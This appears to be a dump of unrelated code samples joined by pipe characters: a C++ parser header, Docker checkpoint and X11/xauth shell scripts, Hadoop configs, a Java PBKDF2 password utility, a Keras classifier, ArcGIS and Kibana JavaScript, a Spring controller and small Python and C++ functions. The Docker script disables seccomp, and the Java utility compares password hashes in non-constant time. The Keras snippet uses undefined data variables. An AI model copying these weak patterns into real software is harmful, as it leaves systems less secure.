/// \returns SourceLoc() if not found
///
/// Note that some binary operators will be ignored when they're at the start
/// of a line, because they can be confused with unary operators. e.g. +
SourceLoc consumeBinaryOperator(BinaryOperatorKind &result,
PrecedenceKind precedence);
/// Parses a cast-expression
ParserResult<Expr> parseCastExpr(llvm::function_ref<void()> onNoExpr);
/// Parses a prefix-expression
ParserResult<Expr> parsePrefixExpr(llvm::function_ref<void()> onNoExpr);
/// Consumes a prefix-operator
/// \param result the operator that was found. Will not be changed if no
/// operator was found.
/// \returns SourceLoc() if not found.
SourceLoc consumePrefixOperator(UnaryOperatorKind &result);
/// Parses a postfix-expression
ParserResult<Expr> parsePostfixExpr(llvm::function_ref<void()> onNoExpr);
/// Parses a member-access on \p base (a suffix).
/// The parser must be positioned on the '.' or '->'
ParserResult<Expr> parseMemberAccessExpr(Expr *base);
/// Parses a primary-expression
ParserResult<Expr> parsePrimaryExpr(llvm::function_ref<void()> onNoExpr);
/// Parses a tuple-expression, returning a TupleExpr/ParenExpr on success.
/// The parser must be positioned on the '('.
ParserResult<Expr> parseTupleExpr();
/// Parses a tuple-expression.
/// The parser must be positioned on the '('.
bool parseTupleExpr(SourceLoc &lParenLoc, SmallVectorImpl<Expr *> &exprs,
SourceLoc &rParenLoc);
//===- Pattern Parsing --------------------------------------------------===//
/// Parses a pattern
ParserResult<Pattern> parsePattern(llvm::function_ref<void()> onNoPat);
/// Parses a tuple-pattern.
/// The parse must be positioned on the '('
ParserResult<Pattern> parseTuplePattern();
//===- Statement Parsing ------------------------------------------------===//
/// \returns true if the parser is positioned at the start of a statement.
bool isStartOfStmt() const;
/// Parses a statement.
/// isStartOfStmt() must return true.
ParserResult<Stmt> parseStmt();
/// Parses a block-statement
/// The parser must be positioned on the "{"
ParserResult<BlockStmt> parseBlockStmt();
/// Parses a return-statement
/// The parser must be positioned on the 'return' keyword.
ParserResult<Stmt> parseReturnStmt();
/// Parses a if-statement.
/// The parser must be positioned on the 'if' keyword.
ParserResult<Stmt> parseIfStmt();
/// Parses a while-statement.
/// The parser must be positioned on the 'while' keyword.
ParserResult<Stmt> parseWhileStmt();
// Parses a condition
/// \param cond where the result will be stored
/// \param name the name of the condition (for diagnostics), e.g. "if".
/// \returns true if no parsing error occured, false otherwise.
bool parseCondition(StmtCondition &cond, StringRef name);
//===- Type Parsing -----------------------------------------------------===//
/// Parses a type. Calls \p onNoType if no type was found.
ParserResult<TypeRepr> parseType(llvm::function_ref<void()> onNoType);
/// Parses a tuple type.
/// The parser must be positioned on the "("
ParserResult<TypeRepr> parseTupleType();
/// Parses a reference type.
/// The parser must be positioned on the "&".
ParserResult<TypeRepr> parseReferenceType();
/// Parses a "maybe" type
/// The parser must be positioned on the "maybe" keyword.
ParserResult<TypeRepr> parseMaybeType();
//===- Other Parsing Utilities ------------------------------------------===//
/// Parses a matching token (parentheses or square/curly brackets).
/// Emits a diagnostic and a note if the token is not found.
/// \param lLoc the SourceLoc of the left matching token
/// \param kind the kind of the right matching token (RParen, RCurly or RSquare)
/// \param customErr if a custom diagnostic is provided, it'll be used
/// instead of the default error message.
/// \returns a valid SourceLoc on success, and invalid one on failure.
SourceLoc parseMatchingToken(SourceLoc lLoc, TokenKind kind,
Optional<TypedDiag<>> customErr = None);
/// Parses a comma-separated list of values.
///
/// \param callback The element parsing function. Returns a boolean indicating
/// whether parsing should continue. It takes a single argument which is the
/// position of the element we're parsing.
///
/// The callback is always called at least once.
void parseList(llvm::function_ref<bool(size_t)> callback);
/// Parses a comma-separated list of values inside a parentheses.
/// The parser must be positioned on the '('
///
/// \param rParenLoc If found, the SourceLoc of the ')' will be stored in this
/// variable. If not found, this is set to prevTokPastTheEnd.
/// \param callBack The element parsing function. Returns
/// true on success, false on parsing error. The callback is not called when
/// the next token is a ')', so you don't need to handle ')' in the callback.
/// \param missingRParenDiag passed to parseMatchingToken
///
/// \returns true on success, false on failure.
bool parseTuple(SourceLoc &rParenLoc,
llvm::function_ref<bool(size_t)> callback,
Optional<TypedDiag<>> missingRParenDiag = None);
//===- Diagnostic Emission ----------------------------------------------===//
/// Emits a diagnostic at \p tok's location.
template <typename... Args>
InFlightDiagnostic
diagnose(const Token &tok, const TypedDiag<Args...> &diag,
typename detail::PassArgument<Args>::type... args) {
return diagnose(tok.getLoc(), diag, args...);
}
/// Emits a diagnostic at \p loc
template <typename... Args>
InFlightDiagnostic
diagnose(SourceLoc loc, const TypedDiag<Args...> &diag,
typename detail::PassArgument<Args>::type... args) {
assert(loc && "Parser can't emit diagnostics without SourceLocs");
return diagEng.diagnose<Args...>(loc, diag, args...);
}
/// Emits a "expected" diagnostic.
/// The diagnostic points at the beginning of the current token, or, if it's
/// at the beginning of a line, right past the end of the previous token
/// consumed by the parser.
template <typename... Args>
InFlightDiagnostic
diagnoseExpected(const TypedDiag<Args...> &diag,
typename detail::PassArgument<Args>::type... args) {
SourceLoc loc;
if (tok.isAtStartOfLine() && prevTokPastTheEnd)
loc = prevTokPastTheEnd;
else
loc = tok.getLoc();
assert(loc && "loc is null?");
return diagEng.diagnose<Args...>(loc, diag, args...);
}
//===- Current DeclContext Management -----------------------------------===//
/// Sets the DeclContext that will be used by the parser.
/// \returns a RAII object that restores the previous DeclContext on
/// destruction.
llvm::SaveAndRestore<DeclContext *> setDeclContextRAII(DeclContext *newDC) {
return {declContext, newDC};
}
/// \returns the current DeclContext used by the parser
DeclContext *getDeclContext() const { return declContext; }
//===- Token Consumption & Peeking --------------------------------------===//
/// Peeks the next token
const Token &peek() const;
/// Consumes the current token, replacing it with the next one.
/// \returns the SourceLoc of the consumed token.
SourceLoc consumeToken();
/// Consumes the current token, replacing it with the next one.
/// This checks that the current token's kind is equal to \p kind
/// \returns the SourceLoc of the consumed token.
SourceLoc consume(TokenKind kind) {
assert(tok.getKind() == kind && "Wrong kind!");
return consumeToken();
}
/// Consumes an identifier, putting the result in \p identifier and returning
/// its SourceLoc.
SourceLoc consumeIdentifier(Identifier &identifier);
/// Consumes the current token if its kind is equal to \p kind
/// \returns the SourceLoc of the consumed token, or SourceLoc() if no token
/// was consumed.
SourceLoc consumeIf(TokenKind kind) {
if (tok.is(kind))
return consumeToken();
return SourceLoc();
}
//===- Recovery ---------------------------------------------------------===//
// NOTE: All of those methods will also stop at the EOF token.
//===--------------------------------------------------------------------===//
/// Skips the current token, matching parentheses.
/// (e.g. if the current token is {, this skips until past the next })
void skip();
/// Skips until the next token of kind \p kind without consuming it.
void skipUntil(TokenKind kind);
/// Skips to the next Decl
void skipUntilDecl();
/// Skips until the next tok or newline.
void skipUntilTokOrNewline(TokenKind tok = TokenKind::Invalid);
/// Skips to the next \p tok, Decl or }
void skipUntilTokDeclRCurly(TokenKind tok = TokenKind::Invalid);
/// Skips to the next \p tok, Decl, Stmt or }
void skipUntilTokDeclStmtRCurly(TokenKind tok = TokenKind::Invalid);
//===- Miscellaneous ----------------------------------------------------===//
/// \returns true if the parser has reached EOF
bool isEOF() const { return tok.is(TokenKind::EndOfFile); }
/// \returns an identifier object for the contents (string) of \p tok
Identifier getIdentifier(const Token &tok);
/// \returns the difference between the column number of a and b.
/// e.g if a is column 5, and b is column 4, returns -1.
int getColumnDifference(SourceLoc a, SourceLoc b) const;
};
} // namespace sora |
#!/bin/bash
set -eux
docker run -d --name looper --security-opt seccomp:unconfined busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done'
# wait for a while
sleep 5
docker logs looper
# run criu checkpoint to save the state
docker checkpoint create --checkpoint-dir=/tmp looper checkpoint
# restore as a new container
docker create --name looper-clone --security-opt seccomp:unconfined busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done'
docker start --checkpoint-dir=/tmp --checkpoint=checkpoint looper-clone
sleep 5
docker logs looper-clone
docker rm -f looper looper-clone || true
|
function zle-line-init zle-keymap-select {
PROMPT=`@PURS@/bin/purs prompt -k "$KEYMAP" -r "$?" --venv "${${VIRTUAL_ENV:t}%-*}"`
zle reset-prompt
}
zle -N zle-line-init
zle -N zle-keymap-select
autoload -Uz add-zsh-hook
function _prompt_purs_precmd() {
@PURS@/bin/purs precmd
}
add-zsh-hook precmd _prompt_purs_precmd
|
#!/bin/bash
runx() {
XAUTHORITY=/tmp/auth "$@"
}
cp /tmp/.docker.xauth /tmp/auth
runx xauth add ${HOSTNAME}/unix${DISPLAY} . $(runx xauth list | awk '$1 !~ /localhost/ {print $3; exit}')
runx xauth generate $DISPLAY . untrusted timeout 0
/usr/local/bin/warsaw/core \
&& runx firefox -no-remote -private-window --class BB --name BB https://www.bancobrasil.com.br/aapf/login.html
|
def create_anagrams(word):
if len(word) <= 1:
return [word]
else:
anagrams = []
for i, letter in enumerate(word):
for j in create_anagrams(word[:i]+word[i+1:]):
anagrams.append(letter + j)
return anagrams |
#!/bin/bash
$HADOOP_HOME/sbin/stop-all.sh
# echo -e "\n"
# $HADOOP_HOME/sbin/stop-dfs.sh
# echo -e "\n"
# $HADOOP_HOME/sbin/stop-yarn.sh
# echo -e "\n"
|
<filename>ProjetOeuvreSpingBoot/src/main/java/com/epul/oeuvre/utilitaires/MonMotPassHash.java
package com.epul.oeuvre.utilitaires;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.security.spec.InvalidKeySpecException;
import java.util.Base64;
import java.util.Random;
public class MonMotPassHash
{
private static final int SaltSize = 32;
private static final Random RANDOM = new SecureRandom();
private static final int ITERATIONS = 10000;
private static final int KEY_LENGTH = 128;
/// <summary>
/// Génère le sel sous forme d'une clé
/// </summary>
/// <returns></returns>
public static byte[] GenerateSalt()
{
byte[] salt = new byte[SaltSize];
RANDOM.nextBytes(salt);
return salt;
}
/**
* On retourne un mot de passe haché.<br>
* erreur : le mot de passe est détruit (le char[] est rempli de zéros)
*
* @param password le mot de passe en clair
* @param salt le sel généré
*
* @retourne un mot de passe avec un sel
*/
public static byte[] generatePasswordHash(char[] password, byte[] salt) {
PBEKeySpec spec = new PBEKeySpec(password, salt, ITERATIONS, KEY_LENGTH);
//Arrays.fill(password, Character.MIN_VALUE);
try {
// génère une clé keyFactory en utilisant l'algorithme PDBKDF2WithHmacSHA1
SecretKeyFactory skf = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
return skf.generateSecret(spec).getEncoded();
} catch (NoSuchAlgorithmException | InvalidKeySpecException e) {
throw new AssertionError("Error while hashing a password: " + e.getMessage(), e);
} finally {
spec.clearPassword();
}
}
/**
* retourne true si les passwors sont identiques .<br>
* erreur : le mot de passe est détruit (le char[] est rempli de zéros)
*
* @param pwdCO le mot de passe à contrôler
* @param pwdh le mot de passe stocké
*
* @return true si tout concorde
*/
public static boolean verifyPassword( byte[] pwdCO, byte[] pwdh) {
// Arrays.fill(password, Character.MIN_VALUE);
if (pwdCO.length != pwdh.length) return false;
for (int i = 0; i < pwdCO.length; i++) {
if (pwdCO[i] != pwdh[i]) return false;
}
return true;
}
/// <summary>
/// Cette méthode transforme une chaîne de caractère en bytes
/// </summary>
public static byte[] transformeEnBytes(String maChaine)
{
Charset charset = StandardCharsets.US_ASCII;
byte[] bytes = Base64.getDecoder().decode(maChaine);
return bytes;
}
/// <summary>
/// Cette méthode transforme une tableau bytes en chaîne
/// </summary>
public static String bytesToString(byte[] monByte)
{
String str = Base64.getEncoder().encodeToString(monByte);
return str;
}
public static char[] converttoCharArray( String maChaine)
{
char[] mesChar = maChaine.toCharArray();
/*char[] mesChar = new char[maChaine.length()];
for (int i =0; i< maChaine.length(); i++)
{
mesChar[i]= maChaine.charAt(i);
}*/
return mesChar;
}
}
|
from typing import List, Dict
def count_one_letter_words(words: List[str]) -> Dict[str, int]:
letter_count = {}
for word in words:
letter = word.strip() # Remove leading and trailing spaces
if letter in letter_count:
letter_count[letter] += 1
else:
letter_count[letter] = 1
return letter_count |
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.optimizers import SGD
import numpy as np
# Define number of features
num_features = 7
# Define flower categories
flower_categories = 3
# Create a neural network model
model = Sequential()
# Input layer with num_features nodes
model.add(Dense(num_features, input_dim=num_features))
model.add(Activation('relu'))
# Adding two hidden layers with 8 and 4 neurons
model.add(Dense(8))
model.add(Activation('relu'))
model.add(Dense(4))
model.add(Activation('relu'))
# Output layer with flower_categories nodes
model.add(Dense(flower_categories))
model.add(Activation('softmax'))
# Setting an sgd optimizer
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy')
# Train the model
model.fit(X, y, batch_size=128, epochs=200) |
/*
* Copyright (C) 2020 con terra GmbH (<EMAIL>)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import Polygon from "esri/geometry/Polygon";
import Graphic from "esri/Graphic";
import * as geometryEngine from "esri/geometry/geometryEngine";
import geometry from "ct/mapping/geometry";
import GraphicsLayer from "esri/layers/GraphicsLayer";
import SketchViewModel from "esri/widgets/Sketch/SketchViewModel";
import LayoutHelper from "./LayoutHelper";
const _geometry = Symbol("_geometry");
const _graphic = Symbol("_graphic");
const _graphicsLayer = Symbol("_graphicsLayer");
const _sketchViewModel = Symbol("_sketchViewModel");
export default class PrintingPreviewDrawer {
activate() {
const mapWidgetModel = this._mapWidgetModel;
if (mapWidgetModel.map) {
this._addGraphicsLayerToMap(mapWidgetModel.map);
} else {
mapWidgetModel.watch("map", ({value: map}) => {
this._addGraphicsLayerToMap(map);
});
}
this[_geometry] = null;
}
deactivate() {
const mapWidgetModel = this._mapWidgetModel;
const map = mapWidgetModel.map;
this._removeGraphicsLayerFromMap(map);
}
drawTemplateDimensions(printInfos, templateOptions, defaultPageUnit) {
const mapWidgetModel = this._mapWidgetModel;
if (!printInfos.templateInfos) {
return;
}
const printSize = this._getPrintSize(printInfos, templateOptions, defaultPageUnit);
if (!printSize) {
return;
}
const width = printSize.width;
const height = printSize.height;
const geometryParams = {
width: width,
height: height,
rotation: mapWidgetModel.rotation
};
const geometry = this._getMainFrameGeometry(geometryParams);
this.removeGraphicFromGraphicsLayer();
this._addGraphicToGraphicsLayer(geometry);
return geometry;
}
_getPrintSize(printInfos, templateOptions, defaultPageUnit) {
const printSize = {};
let templateWidth;
let templateHeight;
const printScale = templateOptions.scale;
const dpi = templateOptions.dpi;
const mapWidgetModel = this._mapWidgetModel;
const spatialReference = mapWidgetModel.spatialReference;
// get templateinfo
const templateInfos = printInfos.templateInfos;
const layout = templateOptions.layout;
if (!layout || layout && layout === "MAP_ONLY") {
const resolution = geometry.calcPixelResolutionAtScale(printScale, spatialReference, dpi);
templateWidth = templateOptions.width;
templateHeight = templateOptions.height;
printSize.width = (templateWidth * resolution);
printSize.height = (templateHeight * resolution);
} else {
const templateInfo = templateInfos.find((templateInfo) => {
const layoutName = templateInfo.layoutTemplate;
const currentLayoutName = LayoutHelper.getLayoutName(layout);
return layoutName === currentLayoutName;
});
if (!templateInfo) {
return null;
}
const frameSize = templateInfo.activeDataFrameSize || templateInfo.webMapFrameSize;
templateWidth = frameSize[0];
templateHeight = frameSize[1];
// currently only meter is supported
const templateUnit = templateInfo.pageUnits || defaultPageUnit;
printSize.width = this._convertTemplateSizeTo(templateWidth, printScale, templateUnit);
printSize.height = this._convertTemplateSizeTo(templateHeight, printScale, templateUnit);
}
return printSize;
}
_convertTemplateSizeTo(value, scale, unit) {
const coordinateTransformer = this._coordinateTransformer;
//let spatialRederence = this._mapWidgetModel && this._mapWidgetModel.spatialReference;
//let wkid = spatialRederence && spatialRederence.wkid || spatialRederence.latestWkid;
let factor;
switch (unit) {
case "MILLIMETER":
factor = 1000;
break;
case "CENTIMETER":
factor = 100;
break;
case "INCH":
factor = 39.3701;
break;
}
return value * scale / factor;
}
_getMainFrameGeometry(geometryParams) {
const mapWidgetModel = this._mapWidgetModel;
const view = mapWidgetModel.view;
const centerPoint = mapWidgetModel.center;
const x = centerPoint.x;
const y = centerPoint.y;
const halfWidth = geometryParams.width / 2;
const halfHeight = geometryParams.height / 2;
const rings = [
[x - halfWidth, y - halfHeight],
[x + halfWidth, y - halfHeight],
[x + halfWidth, y + halfHeight],
[x - halfWidth, y + halfHeight],
[x - halfWidth, y - halfHeight]
];
const polygon = new Polygon({
rings: rings,
spatialReference: view.spatialReference
});
return geometryEngine.rotate(polygon, geometryParams.rotation);
}
_addGraphicsLayerToMap(map) {
const mapWidgetModel = this._mapWidgetModel;
const graphicsLayer = this[_graphicsLayer] = new GraphicsLayer({
listMode: "hide"
});
map.add(graphicsLayer);
const properties = this._printingEnhancedProperties;
if (!properties.enablePrintPreviewMovement) {
return;
}
if (mapWidgetModel.view) {
this._createSketchViewModel(graphicsLayer, mapWidgetModel.view);
} else {
mapWidgetModel.watch("view", ({value: view}) => {
this._createSketchViewModel(graphicsLayer, view);
});
}
}
_removeGraphicsLayerFromMap(map) {
map.remove(this[_graphicsLayer]);
}
_createSketchViewModel(graphicsLayer, view) {
const sketchViewModel = this[_sketchViewModel] = new SketchViewModel({
view: view,
layer: graphicsLayer,
updateOnGraphicClick: true,
defaultUpdateOptions: {
toggleToolOnClick: false,
enableRotation: true,
enableScaling: false,
multipleSelectionEnabled: false
}
});
sketchViewModel.on("update", (event) => {
const graphics = event.graphics;
if (graphics.length) {
const graphic = graphics[0];
const geometry = graphic.geometry;
this[_geometry] = geometry;
this._eventService.postEvent("dn_printingenhanced/PRINTSETTINGS", {geometry: geometry});
}
});
}
_addGraphicToGraphicsLayer(geometry) {
const properties = this._printingEnhancedProperties;
const symbol = properties.printingPreviewSymbol;
const graphic = this[_graphic] = new Graphic({
geometry: geometry,
symbol: symbol
});
this[_graphicsLayer].add(graphic);
if (properties.enablePrintPreviewMovement) {
this._eventService.postEvent("dn_printingenhanced/PRINTSETTINGS", {geometry: graphic.geometry});
}
}
removeGraphicFromGraphicsLayer() {
if (this[_graphic]) {
this[_graphicsLayer].remove(this[_graphic]);
}
this._completeSketching();
}
_completeSketching() {
const sketchViewModel = this[_sketchViewModel];
sketchViewModel && sketchViewModel.complete();
}
showGraphicsLayer(value) {
this[_graphicsLayer].visible = value;
this._completeSketching();
}
}
|
<filename>src/es_archiver/lib/docs/__tests__/index_doc_records_stream.js
/*
* Licensed to Elasticsearch B.V. under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch B.V. licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import expect from '@kbn/expect';
import { delay } from 'bluebird';
import { createListStream, createPromiseFromStreams } from '../../../../legacy/utils';
import { Progress } from '../../progress';
import { createIndexDocRecordsStream } from '../index_doc_records_stream';
import { createStubStats, createStubClient, createPersonDocRecords } from './stubs';
const recordsToBulkBody = records => {
return records.reduce((acc, record) => {
const { index, type, id, source } = record.value;
return [...acc, { index: { _index: index, _type: type, _id: id } }, source];
}, []);
};
describe('esArchiver: createIndexDocRecordsStream()', () => {
it('consumes doc records and sends to `_bulk` api', async () => {
const records = createPersonDocRecords(1);
const client = createStubClient([
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records),
});
return { ok: true };
},
]);
const stats = createStubStats();
const progress = new Progress();
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(1);
expect(progress.getTotal()).to.be(undefined);
});
it('consumes multiple doc records and sends to `_bulk` api together', async () => {
const records = createPersonDocRecords(10);
const client = createStubClient([
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records.slice(0, 1)),
});
return { ok: true };
},
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records.slice(1)),
});
return { ok: true };
},
]);
const stats = createStubStats();
const progress = new Progress();
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(10);
expect(progress.getTotal()).to.be(undefined);
});
it('waits until request is complete before sending more', async () => {
const records = createPersonDocRecords(10);
const stats = createStubStats();
const start = Date.now();
const delayMs = 1234;
const client = createStubClient([
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records.slice(0, 1)),
});
await delay(delayMs);
return { ok: true };
},
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records.slice(1)),
});
expect(Date.now() - start).to.not.be.lessThan(delayMs);
return { ok: true };
},
]);
const progress = new Progress();
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(10);
expect(progress.getTotal()).to.be(undefined);
});
it('sends a maximum of 300 documents at a time', async () => {
const records = createPersonDocRecords(301);
const stats = createStubStats();
const client = createStubClient([
async (name, params) => {
expect(name).to.be('bulk');
expect(params.body.length).to.eql(1 * 2);
return { ok: true };
},
async (name, params) => {
expect(name).to.be('bulk');
expect(params.body.length).to.eql(299 * 2);
return { ok: true };
},
async (name, params) => {
expect(name).to.be('bulk');
expect(params.body.length).to.eql(1 * 2);
return { ok: true };
},
]);
const progress = new Progress();
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(301);
expect(progress.getTotal()).to.be(undefined);
});
it('emits an error if any request fails', async () => {
const records = createPersonDocRecords(2);
const stats = createStubStats();
const client = createStubClient([
async () => ({ ok: true }),
async () => ({ errors: true, forcedError: true }),
]);
const progress = new Progress();
try {
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
throw new Error('expected stream to emit error');
} catch (err) {
expect(err.message).to.match(/"forcedError":\s*true/);
}
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(1);
expect(progress.getTotal()).to.be(undefined);
});
});
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# export JAVA_HOME=/home/y/libexec/jdk1.6.0/
export HADOOP_JOB_HISTORYSERVER_HEAPSIZE=1000
export HADOOP_MAPRED_ROOT_LOGGER=INFO,RFA
#export HADOOP_JOB_HISTORYSERVER_OPTS=
#export HADOOP_MAPRED_LOG_DIR="" # Where log files are stored. $HADOOP_MAPRED_HOME/logs by default.
#export HADOOP_JHS_LOGGER=INFO,RFA # Hadoop JobSummary logger.
#export HADOOP_MAPRED_PID_DIR= # The pid files are stored. /tmp by default.
#export HADOOP_MAPRED_IDENT_STRING= #A string representing this instance of hadoop. $USER by default
#export HADOOP_MAPRED_NICENESS= #The scheduling priority for daemons. Defaults to 0.
#export _JAVA_OPTIONS="" |
<filename>shirt_ecommerce/src/main/java/com/sunil__parcha/Controllers/CategoryController.java
package com.sunil__parcha.Controllers;
import java.util.List;
import java.util.Optional;
import org.json.simple.JSONArray;
import org.json.simple.JSONObject;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RestController;
import com.sunil__parcha.Modals.Category;
import com.sunil__parcha.Service.CategoryService;
@RestController
public class CategoryController {
@Autowired
private CategoryService categoryService;
@GetMapping(value = "/categories")
public JSONObject CatoryGet() {
return categoryService.findDataById();
}
@GetMapping(value = "/categories/{id}")
private Optional<Category> getDepartmentById(@PathVariable("id") int id) {
return categoryService.findById(id);
}
@GetMapping(value = "/categories/inProduct/{id}")
private JSONArray getProductById(@PathVariable("id") int id) {
return categoryService.findProductById(id);
}
@GetMapping(value = "/categories/inDepartment/{id}")
private List<Category> getDepartmrntById(@PathVariable("id") int id) {
return categoryService.findDepartmentById(id);
}
}
|
#include <iostream>
#include <sstream>
#include <vector>
using namespace std;
// Function to split a string into words
vector<string> splitString(string str)
{
stringstream ss(str);
vector<string> words;
// Extracts words from string
string word;
while (ss >> word)
words.push_back(word);
// Returns vector of words extracted
return words;
}
// Driver Code
int main()
{
string inputString = "This is a sample string";
vector<string> words;
words = splitString(inputString);
// Print the vector
for(string word : words)
cout << word << " ";
return 0;
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.